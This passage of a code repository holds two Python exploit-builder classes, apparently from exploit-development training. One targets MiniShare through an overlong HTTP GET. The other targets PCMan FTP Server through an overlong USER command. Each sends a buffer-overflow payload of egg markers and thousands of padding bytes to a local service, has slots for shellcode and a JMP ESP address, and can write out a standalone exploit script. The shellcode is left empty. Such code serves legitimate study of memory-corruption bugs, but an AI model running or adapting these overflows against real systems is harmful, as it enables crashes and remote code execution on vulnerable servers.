28 | 		func_hl = Thread(target = func, args = args, kwargs = kwargs)
29 | 		func_hl.start()
30 | 		return func_hl
31 | 
32 | 	return async_func
33 | 
34 | class Exploit():
35 | 	"""
36 | 	class that contains the exploit, and that can be used to build it
37 | 	"""
38 | 	def __init__(self):
39 | 		self.egg = 'EGGG'
40 | 		self.shellcode = ''
41 | 		self.jmpesp = ''
42 | 		self.prebuff = ''
43 | 		self.postbuff = ''
44 | 		self.buffer = [self.egg*2, "A"*2992]
45 | 		self.file_based = False
46 | 		self.filename = ''
47 | 		self.command = 'C:\\Program Files (x86)\\MiniShare\\minishare.exe'
48 | 
49 | 	@run_async
50 | 	def exploit(self):
51 | 		"""
52 | 		This function runs the actual exploit
53 | 		"""
54 | 		sleep(1)
55 | 		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
56 | 		sock.connect(('127.0.0.1',80))
57 | 		#Test 1
58 | 		message = "GET " + ''.join(self.buffer) + " HTTP/1.1\r\n\r\n"
59 | 		sock.send(message)
60 | 		sock.close()
61 | 		
62 | 	def get_buffer(self):
63 | 		return self.buffer
64 | 	
65 | 	def set_buffer(self,buff):
66 | 		self.buffer = buff
67 | 		
68 | 	def get_buffer_length(self):
69 | 		return len(''.join(self.buffer))
70 | 	
71 | 	def get_egg(self):
72 | 		return self.egg
73 | 	
74 | 	def set_egg(self,egg):
75 | 		self.egg = egg
76 | 
77 | 	def get_filename(self):
78 | 		return self.filename
79 | 	
80 | 	def set_filename(self,filename):
81 | 		self.filename = filename
82 | 	
83 | 	def is_filebased(self):
84 | 		return self.file_based
85 | 
86 | 	def get_command(self):
87 | 		return self.command
88 | 
89 | 	def save(self):
90 | 		f = open('minishare_exploit.py','w')
91 | 		f.write("import socket\n\n" + 
92 | 				"sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
93 | 				"sock.connect(('127.0.0.1',80))\n" +
94 | 				"message = 'GET " + ''.join('\\x%02x' % ord(c) for c in ''.join(self.buffer)) + " HTTP/1.1\\r\\n\\r\\n'\n" +
95 | 				"sock.send(message)\n" +
96 | 				"sock.close()\n")
97 | 		f.close()


--------------------------------------------------------------------------------
/class-pcman.py:
--------------------------------------------------------------------------------
  1 | import socket, sys, struct, subprocess, os
  2 | from threading import Thread
  3 | from functools import wraps
  4 | from time import sleep
  5 | 
  6 | def run_async(func):
  7 | 	"""
  8 | 	function decorator, intended to make "func" run in a separate thread (asynchronously).
  9 | 	@return: the created Thread object
 10 | 
 11 | 	E.g.:
 12 | 	@run_async
 13 | 	def task1():
 14 | 		do_something
 15 | 
 16 | 	@run_async
 17 | 	def task2():
 18 | 		do_something_too
 19 | 
 20 | 	t1 = task1()
 21 | 	t2 = task2()
 22 | 	...
 23 | 	t1.join()
 24 | 	t2.join()
 25 | 	"""
 26 | 	@wraps(func)
 27 | 	def async_func(*args, **kwargs):
 28 | 		func_hl = Thread(target = func, args = args, kwargs = kwargs)
 29 | 		func_hl.start()
 30 | 		return func_hl
 31 | 
 32 | 	return async_func
 33 | 
 34 | class Exploit():
 35 | 	"""
 36 | 	class that contains the exploit, and that can be used to build it
 37 | 	"""
 38 | 	def __init__(self):
 39 | 		self.egg = 'EGGG'
 40 | 		self.shellcode = ''
 41 | 		self.jmpesp = ''
 42 | 		self.prebuff = ''
 43 | 		self.postbuff = ''
 44 | 		self.buffer = [self.egg*2, "A"*4000]
 45 | 		self.file_based = False
 46 | 		self.filename = ''
 47 | 		self.command = 'C:\\Users\\offsec\\Desktop\\PCMan\\PCManFTPD2.exe'
 48 | 
 49 | 	@run_async
 50 | 	def exploit(self):
 51 | 		"""
 52 | 		This function runs the actual exploit
 53 | 		"""
 54 | 		sleep(1)
 55 | 		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 56 | 		print '[*]Connecting to socket'
 57 | 		sock.connect(('127.0.0.1',21))
 58 | 		#Test 1
 59 | 		message = "USER " + ''.join(self.buffer) + " \r\n"
 60 | 		print '[*]Sending exploit'
 61 | 		sock.send(message)
 62 | 		#sleep(1)
 63 | 		sock.close()
 64 | 		
 65 | 	def string_to_hexescaped(self,s):
 66 | 		"""
 67 | 		Takes a string and will convert each char to a printed hex escaped string, and join them together
 68 | 		@param s: input string
 69 | 		@retrun printable hex escaped string
 70 | 		"""
 71 | 		return ''.join('\\x%02x' % ord(c) for c in s)
 72 | 
 73 | 	def get_buffer(self):
 74 | 		return self.buffer
 75 | 	
 76 | 	def set_buffer(self,buff):
 77 | 		self.buffer = buff
 78 | 		
 79 | 	def get_buffer_length(self):
 80 | 		return len(''.join(self.buffer))
 81 | 	
 82 | 	def get_egg(self):
 83 | 		return self.egg
 84 | 	
 85 | 	def set_egg(self,egg):
 86 | 		self.egg = egg
 87 | 
 88 | 	def get_filename(self):
 89 | 		return self.filename
 90 | 	
 91 | 	def set_filename(self,filename):
 92 | 		self.filename = filename
 93 | 	
 94 | 	def is_filebased(self):
 95 | 		return self.file_based
 96 | 
 97 | 	def get_command(self):
 98 | 		return self.command
 99 | 
100 | 	def save(self):
101 | 		f = open('pcman_exploit.py','w')
102 | 		f.write("import socket\n\n" + 
103 | 				"sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
104 | 				"print '[*]Connecting to socket'" +
105 | 				"sock.connect(('127.0.0.1',21))\n" +
106 | 				"message = 'USER " + ''.join('\\x%02x' % ord(c) for c in ''.join(self.buffer)) + " \\r\\n'\n" +
107 | 				"print '[*]Sending exploit'" +
108 | 				"sock.send(message)\n" +
109 | 				"sock.close()\n")
110 | 		f.close()


--------------------------------------------------------------------------------